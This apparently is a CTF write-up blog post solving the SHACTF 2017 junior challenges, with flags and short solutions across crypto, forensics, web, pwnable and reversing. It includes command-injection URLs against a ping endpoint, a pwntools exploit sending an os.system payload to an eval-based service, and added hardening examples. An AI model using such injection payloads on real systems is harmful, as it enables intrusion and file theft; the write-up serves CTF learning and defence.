Chybeta

SHACTF-2017-Growing Up-writeup

SHACTF-2017-Growing Up-writeup, a solo run.

Preface

The Growing Up challenge reads as follows:

You remember the day you started hacking or playing CTF's? You can relive these days by playing our junior version. Just solve all challenges to get the flag ;-)

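So the flag is only awarded once every challenge on Junior has been solved. I worked through them solo for four or five hours and finally got the flag for this challenge at 2:25 a.m.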

Crypto

All about the Base (1)

We found this encoded message. Can you decode it?
V2VsbCBkb25lLAoKdGhpcyBmaWxlIGlzIGVuY3J5cHRlZCB3aXRoIEJhc2U2NC4gT2Z0ZW4gdXNl
ZCBpbiBDVEYncyB0byBkaXNwbGF5IGJpbmFyeSBkYXRhIGluIGEgbW9yZSBmcmllbmRseSB3YXku
IAoKVGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlIGlzIGZsYWd7YjNlOWMzZWVlNjA5YmFjNDZm
YWQ0NDM5Y2YzMjFmZTV9Cg==

flag:

>>> import base64
>>> base64.b64decode("V2VsbCBkb25lLAoKdGhpcyBmaWxlIGlzIGVuY3J5cHRlZCB3aXRoIEJhc2U2NC4gT2Z0ZW4gdXNl ZCBpbiBDVEYncyB0byBkaXNwbGF5IGJpbmFyeSBkYXRhIGluIGEgbW9yZSBmcmllbmRseSB3YXku IAoKVGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlIGlzIGZsYWd7YjNlOWMzZWVlNjA5YmFjNDZm YWQ0NDM5Y2YzMjFmZTV9Cg==")
"Well done,\n\nthis file is encrypted with Base64. Often used in CTF's to display binary data in a more friendly way. \n\nThe flag for this challenge is flag{b3e9c3eee609bac46fad4439cf321fe5}\n"

Rotation (1)

Seems someone rotated the alphabet, can you get the original message back?
Ykksy eua ckxk ghrk zu mkz znk zkdz hgiq. Znk lrgm oy lrgm{30j3g1gg0ijg9l08ijlg52668hi6854g}

Caesar cipher.

Seems you were able to get the text back. The flag is flag{30d3a1aa0cda9f08cdfa52668bc6854a}

Substitute Teacher (2)

Hello, my name is Mr. Smith, I will be your substitute teacher for today. I only have one assignment for you today, if you solve it you may go home. Now be silence and solve it, so I can Netflix and chill!
osvi cpm dprzsob ulsd hddsboeiou. iocpg gpaj njii usei. rihzi uli vrhdd tsulpau ehfsob h dpaow,
s'e so uli eswwri pn h oit iqsdpwi pn pjhobi sd uli oit mrhvf po oiunrsy. npj gpaj innpjud s lhzi
h nrhb npj gpa: nrhb{h230h7i624hnhv36291v5n31nh818w6n}

Run a frequency analysis by feeding the text to this site: http://quipqiup.com/

flag{a230a7e624afac36291c5f31fa818d6f}

Exclusive or … (2)

We found this strange text, can you get the original from it?

The title makes it obvious: XOR encryption. We can use the tool xortool.

This gives the plaintext:

Well done. This text is encrypted with XOR with the single character '\x03'. XOR is often used in CTF challenges. We did use it in our teaser challenges 'Crypto Engine' and 'Website Attack'. The flag of this challenge is: flag{a157d2b4eb73c60ff0cdbe2a2dea06c3}

The flag is:

flag{a157d2b4eb73c60ff0cdbe2a2dea06c3}

Transposition (3)

We intercepted this secret message. We believe it is using a transposition cipher. Can you decipher it?
Citgoe6b0 oohern636 nni.tg1e2 gssThe58e rschii366
aohess3ae tlafcf3dc uvllhl24f lilaaa730 aneglg506 tgnfl{33}

Read it column by column, top to bottom. This gives the plaintext:

Congratulationssolvingthischallenge.Theflagforthischallengeisflag{66153332753b3e86ad4303062e6ecf06}

flag:

flag{66153332753b3e86ad4303062e6ecf06}

Forensics

Deleted File (3)

FLAG{129F0A52F0F41E077E0FD03063FF4FAD}

Misc

Zipfile One (1)

We received this zip file, but is asking for a password. All we know is that the password exists of 5 numbers, can you crack this password to get the hidden information?

We are given a zip archive and told the password is five digits. Brute-forcing gives the password 42831. flag:

flag{d6f56ae046bb241cc61f9d26f8e525d9}

Zipfile Two (2)

We received another zip file, which also requires a password. All we know is that the password is an existing English word with a length of 6 and all lowercase. Can you crack this password?

Brute-force again; the password is: future. This gives the flag:

flag{7128d78caf1e3297386a09afae0f8ea4}

Reverse (3)

We found this file on a server on the other side of the world, it looks weird, can you "reverse" it?

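When I first tried it, I read the bytes from the end into a new file, so that for example \x74 \xe4 \x05 \x98 became \x98 \x05 \xe4 \x74, but the output turned out to be useless. Then it suddenly occurred to me that 74e40598, reversed directly as a string, is 89504e47, which is exactly the PNG file header.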

So I first extracted the hex of the original file, removed the spaces and newlines, and put the result in reverse_fix. The script below produces the "reversed" hex.

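# reverse_fix holds the original file's hex digits with spaces and newlines removed
reverse = open("reverse_fix","r")
flag_reverse = open("flag_reverse.txt","w")
data = reverse.read()
# Reverse the hex string character by character, e.g. 74e40598 -> 89504e47
data = data[::-1]
flag_reverse.write(data)
reverse.close()
flag_reverse.close()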

Then copy the contents of flag_reverse.txt into a hex editor and save it as an image.

flag:

flag{758d7fa2762ab838c4835f1995e151d2}
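
The same reversal can be applied to the raw bytes directly, which also shows why the first byte-order-only attempt failed. This is an added example, not the author's script; the function names are illustrative and the sample bytes are constructed around the 74 e4 05 98 tail quoted above.

```python
PNG_MAGIC = bytes.fromhex("89504e470d0a1a0a")


def byte_reverse(raw: bytes) -> bytes:
    """The first attempt in the text: reverse byte order only."""
    return raw[::-1]


def nibble_reverse(raw: bytes) -> bytes:
    """Reverse the hex string: flips byte order and the two nibbles of each byte."""
    return bytes.fromhex(raw.hex()[::-1])


def nibble_reverse_bitwise(raw: bytes) -> bytes:
    """Same transform without a hex round trip: swap nibbles, then reverse."""
    return bytes(((b & 0x0F) << 4) | (b >> 4) for b in reversed(raw))


def recover_png(raw: bytes) -> bytes:
    """Return the un-reversed file, or raise if neither reading yields a PNG."""
    for transform in (byte_reverse, nibble_reverse):
        candidate = transform(raw)
        if candidate.startswith(PNG_MAGIC):
            return candidate
    raise ValueError("no PNG signature after either reversal")


# Constructed sample: two filler bytes, then the scrambled PNG signature,
# ending in the bytes 74 e4 05 98 mentioned in the text.
SAMPLE = bytes.fromhex("00ff" "a0a1a0d0" "74e40598")

if __name__ == "__main__":
    print("byte order only:", byte_reverse(SAMPLE)[:4].hex())
    print("nibble reversal:", recover_png(SAMPLE).hex())
```

For a real file, pass `open(path, "rb").read()` to `recover_png` and write the result out in binary mode.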

Network

Download (1)

FLAG{259F1B841EAAA4FCB843D77DCDADE55A}

Wanna Buy A Flag? (2)

After opening it, follow the TCP stream to get the flag:

flag{f08574923ec9c9ffb47188e6edc1a20f}

Weird Website (3)

Export the page and inspect it.

flag{8233daf526dcee25fd9ffda3bb99d677}

Captured Mail (4)

import base64
capturedmail = open("capturedmail.zip","wb")
data = "UEsDBBQAAAAIAIy53UoyFb1+UwAAAFgAAAAIABwAZmxhZy50eHRVVAkAAzhtVVk4bVVZdXgLAAEE6AMAAAToAwAAFclLCoAgEADQfaeYA0QQMaOz7iSjjB8QBbVVdPdq+Xhnq7HLvIrM3OpYYSaFUCRCaP1DHuCTlKI1Knz4694dsrHGGELrxAuzV8JDAgVBJn225QVQSwECHgMUAAAACACMud1KMhW9flMAAABYAAAACAAYAAAAAAABAAAApIEAAAAAZmxhZy50eHRVVAUAAzhtVVl1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBOAAAAlQAAAAAA"
capturedmail.write(base64.b64decode(data))
capturedmail.close()

This yields a zip archive; extracting it gives the flag:

flag{1b5978777658baca99ce653af6fa596e}

Web

In Your Head (1)

URL: http://inyourhead.stillhackinganyway.nl/

Capture the traffic and look at the headers to get the flag:

flag{a1a4d64086f713e92a809859d930d120}

Old School (2)

URL: http://oldschool.stillhackinganyway.nl/
Intercept the request and change the User-Agent header to: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

flag{f374df6554c7c6a6fced10396c84baf6}

Broken Image (2)

View the page source and decode the base64 string. This gives the flag:

flag{c0711614358a27110ca159302b106759}

Location (3)

After clicking in, note down the three letters on each new page that is visited. Once the redirects finish, concatenate the letters.

flag{f51cf5e7e1d003986acd2864139553a1}

Ping (4)

http://ping.stillhackinganyway.nl/?ip=127.0.0.1|ls

This shows that there is a file s3cr3tfl4g.txt.

http://ping.stillhackinganyway.nl/?ip=127.0.0.1|cat s3cr3tfl4g.txt

This gives the flag:

flag{a8bb1ea55704762941ef519f98fff075}
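
How a ping endpoint like this one can be hardened, as an added example that is not code from the challenge or the author. The server-side source is not on the page, so `vulnerable_cmdline` is an assumed shape of the flaw; all function names are illustrative, and the first request in the list is constructed.

```python
import ipaddress
import subprocess
from urllib.parse import parse_qs, urlsplit

# A benign request (constructed) followed by the two requests from the writeup.
REQUESTS = [
    "http://ping.stillhackinganyway.nl/?ip=127.0.0.1",
    "http://ping.stillhackinganyway.nl/?ip=127.0.0.1|ls",
    "http://ping.stillhackinganyway.nl/?ip=127.0.0.1|cat s3cr3tfl4g.txt",
]


def ip_param(url: str) -> str:
    """Extract the raw ip query parameter from a request URL."""
    return parse_qs(urlsplit(url).query).get("ip", [""])[0]


def vulnerable_cmdline(ip: str) -> str:
    """Assumed flaw: the parameter is pasted into a string run by a shell."""
    return "ping -c 1 " + ip


def safe_argv(ip: str) -> list:
    """Accept only a literal IPv4/IPv6 address; raises ValueError otherwise."""
    addr = ipaddress.ip_address(ip)
    # The list form is executed without a shell, so "|" has no special meaning.
    return ["ping", "-c", "1", str(addr)]


def ping(ip: str) -> int:
    """Hardened handler body: validate first, then run with shell=False."""
    return subprocess.run(safe_argv(ip), shell=False, timeout=5).returncode


def triage(url: str) -> str:
    """Classify a logged request as 'ok' or 'rejected' with the offending value."""
    value = ip_param(url)
    try:
        safe_argv(value)
        return "ok"
    except ValueError:
        return "rejected: " + repr(value)


if __name__ == "__main__":
    for url in REQUESTS:
        print(triage(url))
```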

Pwnable

small (4)

The server side is a Python service.

#!/usr/bin/env python
print "HACK "*input("Number: ")

The exploit is below:

from pwn import *
r = remote("small.stillhackinganyway.nl",1337)
# Python 2's input() evaluates the line it receives as an expression
payload = "__import__('os').system('cat /home/small/flag')"
r.sendline(payload)
# print(r.recv())
r.interactive()

This gives the flag:

flag{69b5a247b9cd52ac97de7cc94994083e}
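
The root cause is that Python 2's `input()` is `eval(raw_input())`. The following added example (Python 3, not the challenge's code) puts that behaviour beside a hardened parser for the same service; `MAX_COUNT`, the function names and the sample inputs are assumptions made for illustration.

```python
import re

MAX_COUNT = 1000  # assumed upper bound; the original service has none


def py2_input(line: str):
    """What Python 2's input() does with a line: eval() it as an expression."""
    return eval(line)  # kept only to show the flaw; never use on untrusted data


def parse_count(line: str) -> int:
    """Hardened replacement: accept a short run of ASCII digits and nothing else."""
    text = line.strip()
    if not re.fullmatch(r"[0-9]{1,4}", text):
        raise ValueError("not a plain decimal number: %r" % text)
    count = int(text)
    if count > MAX_COUNT:
        # Also bounds the size of the reply, which the original never did.
        raise ValueError("count %d exceeds limit %d" % (count, MAX_COUNT))
    return count


def serve_line(line: str) -> str:
    """One request of the fixed service: the banner repeated, or an error."""
    try:
        return "HACK " * parse_count(line)
    except ValueError as exc:
        return "error: %s" % exc


# Constructed inputs: a number, an arithmetic expression, an oversized count,
# and the payload string from the exploit above (handled purely as text here).
SAMPLES = [
    "3",
    "1+2",
    "5000",
    "__import__('os').system('cat /home/small/flag')",
]

if __name__ == "__main__":
    print("eval-style parse of '1+2':", py2_input("1+2"))
    for sample in SAMPLES:
        print(repr(sample), "->", serve_line(sample))
```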

Re

Find The Flag (1)

Opening it in IDA is enough to get the flag:

flag{b760866fa6f035548be127b7525dbb66}

Hidden Message (3)

Open it in JEB and look at strings.xml.

flag{d3314ac1a08d65ea32ffd30907de2409}

Flip A Coin (4)

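After opening it in IDA, the strings view leads to the key location. The flag is printed when v3 == 100.

v3 is incremented by one after each win; its address is 0x00401668.

Next, debug it dynamically with OllyDbg.

Set a breakpoint at 0x00401668.

On the first round enter 1; if you win, the corresponding location changes from 0 to 1.

Using OllyDbg's data-editing feature, change the 1 to 100; the field is hexadecimal, so enter 64.

Then resume execution. The program finds v3 == 100 and prints the flag.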

flag:

flag{d754c599d47d9b3e4a376e1d770ca8c1}

Jump Around (4)

Write a program and run it.

#include <iostream>
#include <cstdio>
using namespace std;
int main()
{
    int v1[48];
    // Each pair (v2,v8), (v3,v9), ... (v7,v13) is XORed byte by byte,
    // reading the integers in memory order (little-endian host assumed).
    long long v8 = 7523094288207667809LL;
    long long v9 = 8101815670912281193LL;
    long long v10 = 8680537053616894577LL;
    long long v11 = 3833745473465776761LL;
    long long v12 = 959985462;
    long long v13 = 24929;
    long long v2 = 6508264540403273223LL;
    long long v3 = 5213490578399759196LL;
    long long v4 = 5409190721146722066LL;
    long long v5 = 73472674227045146LL;
    long long v6 = 202114575;
    long long v7 = 7173;
    int i;
    // Four 8-byte blocks
    for ( i = 0; i <= 7; ++i ){
        v1[i] = *((char *)&v2 + i) ^ *((char *)&v8 + i);
        printf("%c",v1[i]);
    }
    for ( i = 0; i <= 7; ++i ){
        v1[i] = *((char *)&v3 + i) ^ *((char *)&v9 + i);
        printf("%c",v1[i]);
    }
    for ( i = 0; i <= 7; ++i ){
        v1[i] = *((char *)&v4 + i) ^ *((char *)&v10 + i);
        printf("%c",v1[i]);
    }
    for ( i = 0; i <= 7; ++i ){
        v1[i] = *((char *)&v5 + i) ^ *((char *)&v11 + i);
        printf("%c",v1[i]);
    }
    // One 4-byte block
    for ( i = 0; i <= 3; ++i ){
        v1[i] = *((char *)&v6 + i) ^ *((char *)&v12 + i);
        printf("%c",v1[i]);
    }
    // One 2-byte block
    for ( i = 0; i <= 1; ++i ){
        v1[i] = *((char *)&v7 + i) ^ *((char *)&v13 + i);
        printf("%c",v1[i]);
    }
    return 0;
}

This gives the flag:

flag{f525a6abd58ce9488f3c90904149145d}


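Post title: SHACTF-2017-Growing Up-writeup

Author: chybeta

Published: 2017-08-06 - 23:08

Last updated: 2017-08-07 - 02:08

Original link: http://chybeta.github.io/2017/08/06/SHACTF-2017-Growing-Up-writeup/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.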